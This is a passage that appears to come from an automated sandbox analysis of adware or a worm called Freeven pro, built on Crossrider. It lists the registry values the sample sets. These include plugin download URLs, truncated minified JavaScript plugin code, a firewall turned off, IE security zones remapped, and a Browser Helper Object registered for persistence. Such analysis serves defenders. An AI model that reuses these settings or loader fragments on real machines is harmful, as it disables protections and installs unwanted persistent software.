YTRiNGY1MzU4NDY0OTdhNWE0MzQ4NTE0ZDE0MGQwNjExMTkxOTAyMDQ1MzU1NDIzMzU2MTYxODE1MTMxODE4MDE05"

[HKCU\Software\Freeven pro\Plugins\2]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_1.js"

[HKCU\Software\Freeven pro\Plugins\223]
"Name" = "imonomy_m"

[HKCU\Software\Freeven pro\Plugins\39]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEDatabase.js"

[HKCU\Software\Freeven pro\Plugins\44]
"Version" = "6"

[HKCU\Software\Freeven pro\Plugins\223]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\184]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/noproblemppc_m.js"

[HKCU\Software\Freeven pro\Plugins\72]
"Name" = "appApiValidation"

[HKCU\Software\Freeven pro\Plugins\103]
"Name" = "intext_5_m"

[HKCU\Software\Freeven pro\Plugins\223]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/imonomy_m.js"

[HKCU\Software\Freeven pro\Plugins\104]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

[HKCU\Software\Freeven pro\Plugins\93]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

[HKCU\Software\Freeven pro\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\Freeven pro\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO5"

[HKCU\Software\Crossrider]
"Bic" = "11992E1999324ACFB8E0C19B718E3265IE"

[HKCU\Software\Freeven pro\Plugins\17]
"URL" = "http://js.clientstaticserv.com/plugins/mins/jQuery.js"

[HKCU\Software\Freeven pro\Plugins\3]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_2.js"

[HKCU\Software\Freeven pro\Manifest]
"DisableIe" = "true"

[HKCU\Software\Freeven pro\Plugins\21]
"URL" = "http://js.clientstaticserv.com/plugins/mins/debug.js"

[HKCU\Software\Freeven pro\Installer]
"CodeDownloadDomain" = "http://js.clientstaticserv.com"

[HKCU\Software\Freeven pro\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Freeven pro\Plugins\242]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/price_gong_m.js"
"Version" = "3"

[HKCU\Software\Freeven pro\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\Freeven pro\Plugins\182]
"URL" = "http://js.clientstaticserv.com/plugins/mins/openUrl.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Freeven pro\Plugins\40]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEExtension.js"

[HKCU\Software\Freeven pro\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]e5"

[HKCU\Software\Freeven pro\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el5"

[HKCU\Software\Freeven pro\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b5"

[HKCU\Software\Freeven pro\Plugins\191]
"Name" = "ciuvo_m"

[HKCU\Software\Freeven pro\Plugins\91]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/monetizationLoader.js"

[HKCU\Software\Freeven pro\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

[HKCU\Software\Freeven pro\Installer]
"StatsDomain" = "http://stats.clientstaticserv.com"

[HKCU\Software\Freeven pro\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,5"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process NOTEPAD.EXE:2288 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 31 93 D5 0E 96 D6 4A F1 F0 59 6B D8 9E A5 62"

The process NOTEPAD.EXE:2120 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 17 A7 EB 6D 16 BC 68 1A 3A 34 B0 62 B4 1E 5F"

The process NOTEPAD.EXE:2332 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E D1 8D AA A7 4A DB 98 1F 7C D0 E1 13 63 28 B6"

The process NOTEPAD.EXE:556 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 8A 59 84 A6 7A 52 F4 61 0A 56 7A 5B 7E C0 C0"

The process NOTEPAD.EXE:836 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 BF F8 F9 20 37 7D 7A 80 1D 6D 67 E8 2A AD E0"

The process NOTEPAD.EXE:2228 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE F2 14 E4 5F 46 56 47 16 B0 E3 13 BF F3 D6 42"

The process NOTEPAD.EXE:3472 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 35 E2 84 00 53 F0 39 14 4E 83 A6 A1 17 01 A7"

The process NOTEPAD.EXE:2524 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 29 67 E8 C9 7D 71 78 30 E0 4A 0E 37 6F F0 90"

The process NOTEPAD.EXE:2604 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 FD 26 87 02 32 DC 78 54 FD 99 DC 73 35 18 F8"

The process NOTEPAD.EXE:3804 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE C9 E6 7D 47 7C C1 F2 37 F1 B9 02 A1 00 3E 08"

The process NOTEPAD.EXE:2896 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 8D 34 72 1C FE 6E 6D D4 F5 A3 50 37 75 75 BF"

The process NOTEPAD.EXE:3944 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 D2 3F FB EA 01 46 3F B7 94 13 65 F3 2A AD 94"

The process NOTEPAD.EXE:1136 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 93 1D 2B D2 5B AF A3 16 17 40 0D F9 0A 45 F3"

The process NOTEPAD.EXE:3852 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B C2 99 CD 18 66 62 51 DA A7 52 EC FB F7 5C B8"

The process NOTEPAD.EXE:2152 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 D8 EF FF 02 7E 40 81 B9 36 99 B1 78 6C B5 97"

The process NOTEPAD.EXE:296 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 99 72 A9 DE 8F 96 EA 17 D5 F8 DA 41 3A BD 4C"

The process NOTEPAD.EXE:2516 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 80 2A 25 1D 89 12 B4 95 21 E2 F4 13 A7 B7 9E"

The process NOTEPAD.EXE:2188 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 A6 EB 90 92 69 20 9A 63 82 96 98 03 87 A3 5C"

The process NOTEPAD.EXE:3896 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 17 97 35 F2 01 44 B5 6A 94 B2 56 DD 20 8B 74"

The process netsh.exe:2816 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 28 6D 50 FD BC 55 2E 61 8D 49 30 73 9F 58 A2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

The process netsh.exe:872 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 07 3D F5 4F F0 60 56 5E 9A B5 D7 76 77 D3 8A"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

The process notepad.exe:2056 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 16 1D CB 6D 88 66 84 4E AB A5 84 D2 22 19 21"

The process regsvr32.exe:2376 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\ProgID]
"(Default)" = "CrossriderApp0054248.BHO.1"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
"Version" = "1.0"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}]
"(Default)" = "CrossriderApp0054248.Sandbox"

[HKCR\CrossriderApp0054248.BHO]
"(Default)" = "CrossriderApp0054248"

[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CrossriderApp0054248.BHO\CurVer]
"(Default)" = "CrossriderApp0054248"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"

[HKCR\CrossriderApp0054248.Sandbox.1]
"(Default)" = "CrossriderApp0054248.Sandbox"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\0\win32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"

[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CrossriderApp0054248.BHO.1]
"(Default)" = "CrossriderApp0054248"

[HKCR\Interface\{66666666-6666-6666-6666-660566426648}]
"(Default)" = "ISandBox"

[HKCR\CrossriderApp0054248.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422248}"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\ProgID]
"(Default)" = "CrossriderApp0054248.Sandbox.1"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054248.Sandbox"

[HKCR\CrossriderApp0054248.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422248}"

[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054248"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 7C B2 F8 08 FC 24 B5 46 43 86 E1 A9 44 DD 68"

[HKCR\CrossriderApp0054248.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421148}"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}]
"(Default)" = "Freeven pro"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"

[HKCR\CrossriderApp0054248.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421148}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Freeven pro"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0]
"(Default)" = "CrossriderApp0054248 Type Library"

[HKCR\CrossriderApp0054248.Sandbox\CurVer]
"(Default)" = "CrossriderApp0054248.Sandbox"

[HKCR\Interface\{55555555-5555-5555-5555-550555425548}]
"(Default)" = "ICrossriderBHO"

[HKCR\CrossriderApp0054248.Sandbox]
"(Default)" = "CrossriderApp0054248.Sandbox"

[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\FLAGS]
"(Default)" = "0"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421148}]
"NoExplorer" = "1"

"(Default)" = "CrossriderApp0054248"

The Worm deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\ProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\ProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421148}]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\VersionIndependentProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\VersionIndependentProgID]

